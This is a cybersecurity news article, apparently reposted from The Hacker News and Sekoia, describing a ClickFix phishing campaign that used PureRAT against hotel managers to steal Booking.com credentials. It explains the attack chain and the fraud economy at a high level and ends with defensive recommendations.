Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials

by | Nov 11, 2025 | News

Hotel Managers Targeted by ClickFix Phishing - PureRAT Used to Harvest Booking.com Credentials

Post Views: 9




Join our Patreon Channel and Gain access to 70+ Exclusive Walkthrough Videos.

Patreon
Reading Time: 3 Minutes

Campaign overview

Security researchers have exposed an ongoing, large-scale phishing campaign aimed at the hospitality sector that lures hotel staff and guests to ClickFix-style pages impersonating major booking platforms (Booking.com, Expedia) and deploys malware such as PureRAT (zgRAT) to steal credentials and enable fraud. The operator activity has been active since at least April 2025 and remained operational into October 2025, according to Sekoia, which analyzed the latest wave. The attackers’ goal is to obtain booking-platform admin credentials and payment/card details for resale or direct fraud.

Attack chain (high level)

The campaigns follow a consistent social-engineering + malware flow:

  • Initial compromise / spoofing: Attackers use a compromised email account to send spear-phishing messages to hotel admins or hijack legitimate booking-related email threads.
  • Redirection to ClickFix pages: Targets are directed via a URL chain to a fraudulent “ClickFix” verification page that looks like a reCAPTCHA or security check for Booking.com/Expedia.
  • Clipboard & run social engineering: The bogus page often adapts to the victim’s OS, auto-copies a PowerShell command to the clipboard, and instructs the user to paste/run it (clipboard-hijacking + OS-specific prompts).
  • Payload download & persistence: The command downloads a ZIP containing a binary that side-loads a DLL; the DLL loads PureRAT/zgRAT via DLL sideloading and sets persistence (Run key).
  • Post-exploitation: The operators harvest credentials (extranet accounts, cookies), deploy infostealers, set up remote access, and use stolen credentials to access booking platforms or send fraudulent reservation/verification messages to guests.

 

See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses



Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.

PureRAT (zgRAT) & related malware — capabilities observed

Analysts note the malware family and associated toolset provide a robust spying and takeover capability:

  • RAT features: remote shell, file upload/download, screen capture, webcam/mic control, keylogging, process enumeration, and command execution.
  • Evasion / protection: samples observed protected with .NET Reactor to hinder reverse engineering.
  • Persistence: creation of Run registry keys and DLL side-loading to maintain presence.
  • Credential theft & pivoting: operators deploy browser-stealer tools and loggers to extract session cookies, passwords, and admin credentials for Booking.com, Expedia, Airbnb and similar services.
  • Guest-targeting: attackers also use phishing to collect guest payment details via fake reservation verification pages sent by WhatsApp/email.

Researchers also reported the use of infostealers and RMM-like tools in related clusters (NetSupport, DanaBot variants, Lumma Stealer, StealC), indicating mixed objectives: account resale and direct fraud.

Crime-as-a-service and the illicit economy behind the attacks

Sekoia and other analysts highlight how the attack chain is supported by an ecosystem:

  • Account resale & log-checker services: Telegram bots and underground sellers offer Booking/Expedia logs and “checked” accounts for sale; services verify harvested credentials via proxies.
  • Role specialization: operators outsource distribution to “traffers” (malware distributors) and buy booking logs from market operators who claim manual verification.
  • Professionalization: turnkey services (log databases, checkers, malware builders) lower the barrier and scale these fraud operations across regions.

This commercialized model accelerates both the spread and sophistication of hospitality-targeted campaigns.

Business & guest impact

Consequences for hospitality organisations include:

  • Unauthorized booking changes and load juggling leading to financial loss.
  • Guest fraud / card theft from fake reservation verification pages.
  • Reputational damage and loss of customer trust.
  • Resale of valid extranet access or misuse to send follow-up phishing to guests.
  • Regulatory exposure if payment data or personal information is exposed.

Anecdotal victim reporting indicates attackers have successfully deleted booking emails, blocked notifications, and impersonated carriers during recovery calls — demonstrating operational knowledge of booking workflows.

Trending: Can Outsourcing Actually Save You Money?




Trending: Offensive Security Tool: EvilWAF – Web Application Firewall Bypass Toolkit

Defensive recommendations

To reduce risk and detect these campaigns, organisations should prioritize:

  • Email & link protections: block or sandbox links to unknown landing pages; block .exe/.msi attachments and flag pages that auto-copy clipboard contents.
  • Stop execution from the clipboard: educate staff not to paste/run commands copied from websites; disable unnecessary script execution policies for non-admin users.
  • Restrict RMM/remote tools: allow only pre-approved remote-support tools and use application allowlisting and EDR to block unauthorized installers.
  • Harden booking extranet accounts: enforce strong, unique passwords, enforce MFA on Booking/Expedia extranet accounts, and monitor for anomalous logins (geographic anomalies, rapid session use).
  • Credential monitoring & rotation: treat exposed accounts as high-risk; rotate credentials promptly and audit sessions on compromise suspicion.
  • Endpoint detection: tune EDR to flag DLL side-loading, Run-key persistence changes, and new processes spawned by explorer/PowerShell.
  • Guest protection: avoid asking customers to enter card details via emailed links; use secure payment flows and crisis-response templates for communications.
  • Threat intel & sharing: share IOC feeds with sector peers and ISACs; monitor underground markets for leaked extranet accounts tied to your properties.

Trending: Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft

Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]

Source: thehackernews.com, blog.sekoia.io

Source Link

Merch

Recent News

EXPLORE OUR STORE

Offensive Security & Ethical Hacking Course

Begin the learning curve of hacking now!

Information Security Solutions

Find out how Pentesting Services can help you.

Join our Community

Share This